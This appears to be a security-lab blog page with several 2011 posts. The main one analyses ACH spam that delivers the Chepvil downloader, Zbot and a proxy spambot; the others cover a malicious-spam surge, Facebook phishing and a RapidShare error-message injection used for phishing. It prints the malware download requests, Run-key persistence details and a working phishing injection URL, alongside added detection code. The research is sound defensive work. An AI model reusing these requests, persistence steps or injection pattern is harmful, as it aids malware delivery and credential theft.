Posts Tagged ‘Featured’


An analysis of the ACH spam campaign

By Rodel Mendrez  •  September 6th, 2011  •   Malware Spam

Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious-looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message carried a malicious attachment named “document.zip”. As suspected, the attachment was a downloader that we have seen a lot of lately: Chepvil.

ACH spam campaign from the Donbot botnet


The Chepvil downloader, unsurprisingly, proceeded to retrieve more than one piece of additional malware. The first was the password-stealing malware Zbot: the file “s.exe”, a Zbot variant, was fetched from the domain rattsillis[dot]com with a standard HTTP request.

GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: rattsillis.com
Cache-Control: no-cache

The file “s.exe” is executed immediately after being downloaded and drops the following files in the infected system:

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself

C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.

Zbot then attempted to contact its command and control server at a randomly generated domain name.

The second piece of malware that Chepvil downloaded was a proxy-based spambot, an executable file “22.exe” from the same domain rattsillis[dot]com.

GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rattsillis.com
Cache-Control: no-cache 

The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 out of 45 antivirus programs, mostly under generic detection names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10 KB.

C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe

It also drops another copy of itself in the Application Data folder, using a filename of the form KB{6 random digits}.exe.

C:\Documents and Settings\{user}\Application Data\KB117188.exe

The malware then adds an autorun registry value so that it is launched again at every Windows start-up.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

KB117188.exe = "C:\Documents and Settings\{user}\Application Data\KB117188.exe"

After installation, the parent spambot process executes the svchost.exe it dropped in the Windows TEMP folder and then exits.
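As an added example (not code from the original post), the following Python check looks for the two persistence artifacts described above in constructed sample data: a Run value named KB followed by six digits whose data points into a user's Application Data folder, and an svchost.exe located in a user's Temp folder rather than the Windows system directory. The sample registry values and paths are constructed, and the user name alice is a placeholder.

```python
import re

# Constructed sample data modelled on the artifacts described above; the
# user name "alice" is a placeholder, not a value from a real host.
SAMPLE_RUN_VALUES = {
    "KB117188.exe": r'"C:\Documents and Settings\alice\Application Data\KB117188.exe"',
    "ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe",
    "KB12345.exe": r'"C:\Documents and Settings\alice\Application Data\KB12345.exe"',
}
SAMPLE_FILES = [
    r"C:\Documents and Settings\alice\Local Settings\Temp\svchost.exe",
    r"C:\WINDOWS\system32\svchost.exe",
    r"C:\Documents and Settings\alice\Application Data\KB117188.exe",
]

# Value name of the form KB + exactly six digits + .exe ...
RUN_NAME_RE = re.compile(r"^KB\d{6}\.exe$", re.IGNORECASE)
# ... whose data points at a file of the same form inside a user's
# Application Data folder (quotes around the path are optional).
APPDATA_PATH_RE = re.compile(
    r'^"?[A-Z]:\\Documents and Settings\\[^\\]+\\Application Data\\KB\d{6}\.exe"?$',
    re.IGNORECASE,
)
# The real svchost.exe lives in the Windows system directory; a copy in a
# user's Temp folder matches the dropped proxy spambot.
TEMP_SVCHOST_RE = re.compile(
    r"^[A-Z]:\\Documents and Settings\\[^\\]+\\Local Settings\\Temp\\svchost\.exe$",
    re.IGNORECASE,
)


def suspicious_run_values(run_values):
    """Return Run value names matching the KB{6 digits}.exe autorun pattern."""
    return sorted(
        name for name, data in run_values.items()
        if RUN_NAME_RE.match(name) and APPDATA_PATH_RE.match(data)
    )


def suspicious_svchost_paths(paths):
    """Return svchost.exe paths located in a user's Temp folder."""
    return [p for p in paths if TEMP_SVCHOST_RE.match(p)]


if __name__ == "__main__":
    print("autorun values:", suspicious_run_values(SAMPLE_RUN_VALUES))
    print("temp svchost:  ", suspicious_svchost_paths(SAMPLE_FILES))
```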

Instead of listening on a specific port and waiting for inbound connections, the proxy spambot reaches out to its control server, first resolving the domain name luis-vuitton-elite[dot]com with a standard DNS A query. If that fails, the bot falls back to a randomly generated domain name.


The malware code that attempts to connect to the control server


Once connected, the proxy spambot opens a channel on port 1001 over which it exchanges packets of data with the control server.

Exchange of data between the control server and the spambot


Meanwhile, on port 1002, the spambot receives the actual spam data from the control server and relays it to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.

Spam is received by the spambot from the control server and relayed to the recipients.


The command and control server’s IP address is based in Germany:

WHOIS information about the control server


This spambot’s recent spamming activity includes both pharmaceutical spam and further ACH campaigns that appear to come from NACHA.org, very similar to the one which led to this infection in the first place.

Sample spam email from the Proxy-based spambot

In conclusion, there is not much that is new in this sequence of events: a spammed-out Trojan downloader triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering, and the best way to protect yourself is to be cautious.



Massive Rise in Malicious Spam

By Rodel Mendrez  •  August 16th, 2011  •   Spam

In April this year, we reported on a spike in malicious spam. Yes, that was a significant increase but not as massive as we have observed this week. From the beginning of August, we have observed a huge surge of malicious spam which far exceeds anything we have seen over the past two years, including prior to the SpamIt takedown last October. The majority of the malicious spam comes from the Cutwail botnet, although Festi and Asprox are among the other contributors.


Last week, malicious spam made up at least 13% of the total spam volume we received, which is unusual. Yesterday that number spiked to 24%.

Spam by category as of last week

Four of the campaigns, which we identified as originating from the Cutwail botnet, use mostly recycled spam themes: Fedex, credit card, changelogs and invoices. The malware is attached within a compressed ZIP archive and is a Trojan that downloads additional malware, including Fake AV, SpyEye and the Cutwail spambot itself.

Fedex

Fedex Spam Campaign

Credit Card Blocked

Credit Card Blocked spam campaign

Invoice

Invoice spam campaign

Change Log

Change Log spam campaign


Meanwhile, Asprox is continuing to send out malicious hotel transaction spam. The attached malware in this spam campaign installs a password stealer and Fake AV.

Sample of malicious spam sent by Asprox


The Festi botnet has also joined the fray and is sending a malicious “UPS” campaign that distributes the Chepvil Trojan, a downloader that is also installing Fake AV.

UPS spam campaign sent by Festi

This is an epic amount of malicious spam. After multiple recent botnet takedowns, cyber criminal groups remain resilient, clearly looking to build their botnets and distribute more fake AV in the process. It seems spammers have returned from a holiday break and are enthusiastically back to work.



‘Just applied for my own @facebook.com email account’ Phish Spreading

By Satnam Narang  •  March 11th, 2011  •   Phishing

There is a new scam making the rounds on Facebook today. This particular scam surrounds Facebook’s recently revamped Messaging product, which now gives Facebook users an opportunity to own a @facebook.com e-mail address. In the past, there were scams surrounding the launch of this product, which followed in the footsteps of similar Facebook scams: requiring Facebook users to authorize a rogue application, fill out a survey to earn the scammers’ referral money, and at the end, redirecting users to http://facebook.com/about/messages

Today’s scam is different – users are now being phished for their Facebook login credentials:

Facebook E-Mail Scam Wall Post

New Facebook Phishing Campaign Spreading




Can’t Believe A Girl Did This Because of Justin Bieber? You Shouldn’t

By Satnam Narang  •  February 28th, 2011  •   Cybercrime

We are currently monitoring a Facebook “likejacking” scam that is similar to previous campaigns that were first observed in 2010.

Justin Bieber Likejacking Scam Spreads on Facebook


“Likejacking” is a term that is specifically used to refer to a “clickjack” that leads to an end user unknowingly “liking” a website via the social network, Facebook. By tricking users into liking the page, a post is published to their Facebook walls and can be viewed by their friends and family.




RapidShare.com – The Phishing Begins

By Yaniv Miron  •  February 20th, 2011  •   Phishing

A few weeks ago, M86 Security Labs discovered how to create a phishing page on RapidShare.com. As most of you probably know, RapidShare is one of the largest file sharing websites, with thousands of users worldwide.

While trying to download a file from RapidShare.com we encountered an error message indicating that the servers were busy.

We decided to test the error message and found that there is an improper input validation vulnerability in the “downloaderror” field.

Below is the original error message from RapidShare:

RapidShare.com Error message – Too many users downloading…

In the following screen, we see a fake phishing message that offers users the opportunity to buy a premium account for RapidShare:

RapidShare.com Fake Error message

A closer look:

For further information, see this demo link:

http://rapidshare.com/#!downloaderror|3|623624|test.avi|723|Too%20many%20users%20downloading%20from%20this%20server%20right%20now.%20Please%20call%201-800-555-fake-premium%20or%20email%20your%20Credit%20Card%20to%20fake@premiumfake.com%20to%20get%20a%20premium%20account%20for%20only%209.95$%20a%20month%20!!!

In addition, we can control all of the “downloaderror” fields. For example, the file folder (623624), the file name (test.avi), and of course the error message.

This type of improper input validation can help malicious attackers create phishing pages within RapidShare.com. A user that receives an email or a link to the malicious phishing page could unknowingly give away credit card information to the malicious attacker either by email or by a phone call.
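As an added example (not code from the original post), the following Python splits the #!downloaderror fragment of the demo link above into its pipe-separated fields, so each attacker-controlled value can be seen on its own, and then flags the message field for contact details and lure phrases that a genuine "servers busy" error would not carry. The field labels are assumed names for this illustration; the post names only the folder, file name and message.

```python
import re
from urllib.parse import unquote, urlsplit

# The demo link quoted in the post, used here as sample input.
DEMO_LINK = (
    "http://rapidshare.com/#!downloaderror|3|623624|test.avi|723|"
    "Too%20many%20users%20downloading%20from%20this%20server%20right%20now.%20"
    "Please%20call%201-800-555-fake-premium%20or%20email%20your%20Credit%20Card"
    "%20to%20fake@premiumfake.com%20to%20get%20a%20premium%20account%20for%20only"
    "%209.95$%20a%20month%20!!!"
)

# Assumed labels for the five pipe-separated fields; the post names the
# folder, file name and message, the other two are labelled by position.
FIELD_NAMES = ("code", "folder", "filename", "size", "message")

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
PHONE_RE = re.compile(r"\b\d[\d()-]{2,}\d\b")   # e.g. 1-800-555
KEYWORDS = ("credit card", "premium account", "call", "email")


def parse_downloaderror(url):
    """Split a rapidshare.com #!downloaderror fragment into its fields.

    Returns None for URLs without such a fragment. Only five splits are
    made, so a message that itself contains "|" stays in one piece.
    """
    fragment = urlsplit(url).fragment
    if not fragment.startswith("!downloaderror|"):
        return None
    parts = fragment.split("|", 5)[1:]
    return {name: unquote(value) for name, value in zip(FIELD_NAMES, parts)}


def phishing_indicators(message):
    """Flag contact details and lure phrases in a caller-supplied message."""
    found = []
    if EMAIL_RE.search(message):
        found.append("email_address")
    if PHONE_RE.search(message):
        found.append("phone_number")
    lowered = message.lower()
    found.extend(f"keyword:{k}" for k in KEYWORDS if k in lowered)
    return found


if __name__ == "__main__":
    fields = parse_downloaderror(DEMO_LINK)
    print(fields)
    print("indicators:", phishing_indicators(fields["message"]))
```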

We contacted RapidShare.com regarding this subject and received a response from the RapidShare Abuse team assuring us that they have fixed the issue.
